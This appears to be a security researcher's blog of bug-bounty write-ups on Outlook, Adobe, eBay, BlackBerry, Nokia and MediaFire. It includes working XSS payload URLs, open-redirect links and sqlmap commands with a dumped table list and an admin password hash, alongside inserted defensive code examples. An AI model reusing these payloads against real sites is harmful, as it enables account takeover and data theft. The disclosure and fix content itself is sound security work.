Thursday, October 8, 2015

Microsoft Pays $24,000 To Researcher For Preventing Dangerous Outlook Worm

Email is, perhaps, the most hopelessly insecure of all web apps. For individuals and businesses it can be a nightmare attempting to keep hackers out of inboxes. This summer, Wesley Wineberg, a security researcher at Synack, found that to be all too true, discovering a bug affecting all services running over Microsoft’s Live.com, allowing malicious hackers to gain access to a user’s entire Outlook account.
Admittedly, there was plenty of trickery involved. Wineberg first analysed the way in which Outlook allowed other apps to access it, using a standard authorization protocol known as OAuth. He discovered he could create an “evil app” containing an OAuth bypass, needing only to trick a user into visiting a website, and they would effectively grant that naughty software access to everything in their account.
But for most hackers, this kind of vulnerability, known as a cross-site request forgery (CSRF), is all too common across the web. Typically, these attacks end as soon as the legitimate user logs out, but in the case of Outlook anyone abusing Wineberg’s vulnerability would have permanent access to the account, Wineberg said.
Most concerning of all, it could have been abused to create a nasty email worm, he added. “The real danger of this vulnerability is that it would be very easy to turn into the classic email worm of decades past. After the first victim is compromised, this vulnerability could be used to email every one of their contacts with a link that would then compromise those users’ accounts as well,” Wineberg noted, providing the below footage of his attack to FORBES.


“This really is just a classic CSRF vulnerability. The only thing that’s surprising about it is that it’s in a critical authentication system which ultimately can be used to take over any user’s account,” he added in a Synack blog post.

Friday, August 30, 2013

Multiple Adobe Bugs by Me

Open Redirector: https://tv.adobe.com/session/?redirect=http://google.com

If a user who is logged in to Adobe clicks the link, they are automatically redirected to google.com; an attacker could instead supply an encoded malicious link to harm Adobe users.


Directory Listing:

http://groups.adobe.com/CFIDE/
http://groups.adobe.com/CFIDE/adminapi/
http://groups.adobe.com/CFIDE/administrator/images/
http://groups.adobe.com/CFIDE/scripts
http://groups.adobe.com/CFIDE/images/
http://groups.adobe.com/CFIDE/debug
http://groups.adobe.com/CFIDE/portlets/

and so on....


Open FCKeditors:

http://groups.adobe.com/CFIDE/scripts/ajax/FCKeditor/editor./filemanager/browser/default/browser.html


http://groups.adobe.com/CFIDE/scripts/ajax/FCKeditor/editor/fckeditor.original.html



Open file uploads:

http://groups.adobe.com/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/browser/default/frmupload.html



Persistent XSS in Ebay - One of the best '12 discoveries

I found this bug last year; it was my first bug and the most precious one.

In order to exploit the vulnerability, the attacker would need a seller account. Once logged in to the seller account on eBay, the attacker would create a listing for sale in which he put the XSS exploit code.




Here was the page where I injected the code: http://www.ebay.com/itm/181023275832?ssPageName=STRK:MESELX:IT&_trksid=p3984.m1555.l2649 

The mirror is available here: http://www.xssed.com/mirror/79254/ 

In the news for this discovery: https://www.google.co.in/search?q=ebay+persistent+xss&oq=ebay+persistent+xss&aqs=chrome.0.69i57j69i62.3702j0&sourceid=chrome&ie=UTF-8

Tuesday, June 4, 2013

XSS in Ebay Labs

I found 2 non-persistent XSS bugs in the eBay Labs website. Below are the details.

URL: http://labs.ebay.com

Alert Box:

1st one: http://labs.ebay.com/erl/demoto/to-add=lp&origtitle=Mr.&qy=%27%20onmouseover%3dprompt%281337%29%20bad%3d%27&skipk=20&sq=pop&title=Mr.

2nd one: http://labs.ebay.com/publications/-wpa-paged=2&wpa-sort=%22%20onmouseover%3dprompt%281337%29%20bad%3d%22




Attack Details: URL-encoded GET input qy was set to ' onmouseover=prompt(1337) bad='

The input is reflected inside a tag parameter between single quotes.

Affected items: /erl/demoto/to & /publications/

The impact of this vulnerability: Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

How to fix this vulnerability: Your script should filter metacharacters from user input.

This bug was reported to eBay and is now resolved.
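The attribute-context reflection described above, reproduced as an added example (constructed for illustration, not eBay's code): the unencoded value closes the single-quoted attribute and smuggles in an event handler, while HTML-attribute encoding of the same input keeps it inert. The template and the parser-based check are assumptions of this example.

```python
import html
from html.parser import HTMLParser

# Constructed reproduction of the reflection reported above; not eBay's code.
PAYLOAD = "' onmouseover=prompt(1337) bad='"


def render_vulnerable(qy: str) -> str:
    """Reflects qy unencoded inside a single-quoted attribute (the reported bug)."""
    return f"<input type='text' name='qy' value='{qy}'>"


def render_fixed(qy: str) -> str:
    """Same template with HTML-attribute encoding: html.escape(quote=True)
    turns ' into &#x27; so the value can no longer terminate the attribute."""
    return f"<input type='text' name='qy' value='{html.escape(qy, quote=True)}'>"


class _TagAttrs(HTMLParser):
    """Collects the attributes a browser would see on each start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        self.attrs.update(attrs)


def parse_attrs(markup: str) -> dict:
    """Attribute name -> value (entities decoded, as a browser would do)."""
    parser = _TagAttrs()
    parser.feed(markup)
    return parser.attrs


def event_handlers(markup: str) -> list:
    """Names of on* event-handler attributes present on the rendered tag."""
    return sorted(name for name in parse_attrs(markup) if name.startswith("on"))
```

The fixed rendering still round-trips the exact input as the attribute's value, which is why output encoding is preferable to stripping "metacharacters" from the input.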




BlackBerry Multiple Bugs


I found 3 bugs in the BlackBerry mobile site, m.blackberry.com, and 2 bugs in the developer site, developer.blackberry.com.

Tested on: OS: Windows 7; Browser: Google Chrome & Firefox (latest versions)

1. URL redirection is sometimes used as part of phishing attacks that confuse visitors about which website they are visiting, or that trick them into downloading malicious files.

A remote attacker can redirect users from your website to a specified URL. This problem may assist an attacker in conducting phishing attacks, trojan distribution or spamming.


=> Vulnerable URL: http://m.blackberry.com/cps/rde/xchg/blackberrymobile2012/hs.xsl/-/index.html?formregion=//www.apple.com&RememberRegion=yes&submit=GO

The above URL redirects to apple.com, which could be replaced with a malicious phishing URL or a file containing malware.

Fix: Your script should properly sanitize user input.


2. Path disclosure
Type: Information Disclosure
URL: http://m.blackberry.com/cps/rde/xchg/blackberrymobile2012


The above URL is disclosing the path on the server: /cps/rde/xchg/SID-B461826F-730AD1C9/blackberrymobile2012


Fix: Deal with errors gracefully when a file is not located where it should be.


3. Important HTML forms without CSRF protection: /at/de/feedback.html, /at/de/polling1.html


I reported this to BlackBerry PSIRT already & the bugs are patched by now.

The 2 bugs in the developer site were use of the deprecated SSL 2.0 protocol & weak SSL ciphers, which are not very critical.
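The open redirects above (Adobe's redirect=http://google.com and BlackBerry's formregion=//www.apple.com) share one root cause: the target is taken from the request and never checked against the site's own hosts. The validator below is an added example, not code from either site; the allowed hosts and origin are placeholder assumptions.

```python
from urllib.parse import urlsplit, urljoin

# Hosts this application may redirect to (constructed placeholder values).
ALLOWED_HOSTS = {"example.com", "www.example.com"}
OWN_ORIGIN = "https://www.example.com"
DEFAULT_TARGET = "/"


def safe_redirect_target(param: str) -> str:
    """Return a redirect URL that stays on an allowed host, else DEFAULT_TARGET.

    Rejects the shapes reported above: an absolute URL to a foreign host
    (redirect=http://google.com) and a protocol-relative URL
    (formregion=//www.apple.com), which browsers resolve as an external site.
    """
    param = (param or "").strip()
    if not param:
        return DEFAULT_TARGET
    # Some browsers normalise "/\evil.com" to "//evil.com"; refuse backslashes.
    if "\\" in param:
        return DEFAULT_TARGET
    parts = urlsplit(param)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return DEFAULT_TARGET  # javascript:, data:, ftp: ...
    if parts.netloc:
        # Absolute or protocol-relative: the host must be on the allowlist.
        # .hostname ignores userinfo, so "http://www.example.com@evil.com" fails.
        host = (parts.hostname or "").lower()
        return param if host in ALLOWED_HOSTS else DEFAULT_TARGET
    # No host: accept only a same-site path ("/..."), never "//..." or "///...".
    if not param.startswith("/") or param.startswith("//"):
        return DEFAULT_TARGET
    return urljoin(OWN_ORIGIN, param)
```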




Non-persistent XSS in Nokia Subdomain

I found 2 non-persistent XSS bugs in one Nokia subdomain; the details are below.



Subdomain: https://www.sales.nokia.com

Vulnerability type: XSS

Affected Items:

/mis/forgotPwdSubmit.do
/mis/loginSubmit.do

Vulnerable URLs:

1. https://www.sales.nokia.com/mis/loginSubmit.do?CALLING_PAGE=&txtPasswd=&txtUsrName="</script>'<SCRIPT>alert("XSS")</SCRIPT>


2. https://www.sales.nokia.com/mis/forgotPwdSubmit.do?txtEmailID=&txtUserID=%22%3C/script%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E

Though it was not that easy to find this XSS, as it was a login page that used POST requests to authenticate and there was JavaScript blocking the use of any special characters. So I used the Firefox addon to tamper with the request, putting admin@nokia.com as the email and 12345 as the password, then tampering the admin@nokia with a normal payload. It still didn't execute, so I checked the source of the page and noticed there was a " and an open <script> tag, so I modified the payload and it successfully executed.



Tested on: Windows 7 and Firefox (latest version)

I then reported it to Nokia.



-Cyb3R_Shubh4M

Mediafire Blind SQL Injection



I found a critical blind SQLi bug in the MediaFire knowledge base, which could be used to break into MediaFire servers. Details below.


#Software Type: PHPKB Knowledge Base Software v7

#Tool Used: sqlmap on ubuntu

#Tested on: Ubuntu & Windows (Chrome & Firefox)

#Commands used in sqlmap:


1>>   ./sqlmap.py -u http://knowledgebase.mediafire.com/article.php?id=72 --dbs

2>>   ./sqlmap.py -u http://knowledgebase.mediafire.com/article.php?id=72 -D knowledgebase --tables





Type: PHPKB Knowledge Base Software

---------------------
Blind SQL Injection
---------------------

http://knowledgebase.mediafire.com/article.php?id=72

Target:
http://knowledgebase.mediafire.com/article.php?id=%Inject_Here%72

---

Place: GET
Parameter: id

Type: AND/OR time-based blind
Title: Mysql > 5.0.11 AND time-based blind
Payload: id=72 AND SLEEP(5)

---

available databases [3]:

[*] information_schema
[*] knowledgebase
[*] test

Database: knowledgebase
[27 tables]
+-------------------------------+
| phpkb_article_collaboration
| phpkb_article_versions      
| phpkb_article_visits        
| phpkb_articles              
| phpkb_attachments          
| phpkb_authors              
| phpkb_autosave              
| phpkb_categories            
| phpkb_comments              
| phpkb_custom_data          
| phpkb_custom_fields        
| phpkb_favorites            
| phpkb_glossary              
| phpkb_groups                
| phpkb_groups_categories    
| phpkb_groups_relations      
| phpkb_languages            
| phpkb_login_attempts        
| phpkb_news                  
| phpkb_ratings              
| phpkb_referrers            
| phpkb_relations            
| phpkb_saved_searches        
| phpkb_subscribers          
| phpkb_templates            
| phpkb_tickets              
| phpkb_translation_assignments
+-------------------------------+

While digging through their tables I found the admin details in the table _authors. It was getting a bit harder, as sqlmap was not able to extract the column names completely, so I made a guess: author_username & author_password. I found the details below:

admin:3793afe7fdea09c7f8055834cc252234

While testing the hash algorithm I found that it was MD5 or Domain Cached Credentials.
But I couldn't crack it; it was taking a hell of a lot of time.

So that was all. When I reported it to MediaFire's VP they said it was a duplicate, and hence I made it public.
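The injection above works because the id parameter is concatenated into the query, so an appended condition such as "AND SLEEP(5)" is executed as SQL and its effect (here a delay) becomes the oracle. The example below is added here and is not PHPKB's code: it uses an in-memory SQLite table named like phpkb_articles, and since SQLite has no SLEEP() it shows the same inference with a true/false condition instead of a time delay, beside the parameterized form that closes the hole.

```python
import sqlite3

# Added example, not PHPKB's code: a tiny in-memory table stands in for
# phpkb_articles so both query styles can be run against the same data.
ARTICLES = [(72, "How do I reset my password?"), (73, "Upload size limits")]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE phpkb_articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO phpkb_articles VALUES (?, ?)", ARTICLES)
    return db


def article_vulnerable(db: sqlite3.Connection, id_param: str):
    """String concatenation: whatever arrives in ?id= becomes part of the SQL.
    An appended condition changes the result (or, with MySQL SLEEP(), the
    response time); that difference is the oracle a blind injection reads."""
    sql = "SELECT title FROM phpkb_articles WHERE id=" + id_param
    return db.execute(sql).fetchone()


def article_fixed(db: sqlite3.Connection, id_param: str):
    """Validate the type first, then bind it as a parameter: the input is data,
    never SQL, so 'id=72 AND ...' cannot reach the query at all."""
    try:
        article_id = int(id_param)
    except ValueError:
        return None
    sql = "SELECT title FROM phpkb_articles WHERE id=?"
    return db.execute(sql, (article_id,)).fetchone()


def compare(id_param: str) -> tuple:
    """Run the same request through both handlers on a fresh database."""
    db = make_db()
    return article_vulnerable(db, id_param), article_fixed(db, id_param)
```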





-Cyb3R_Shubh4M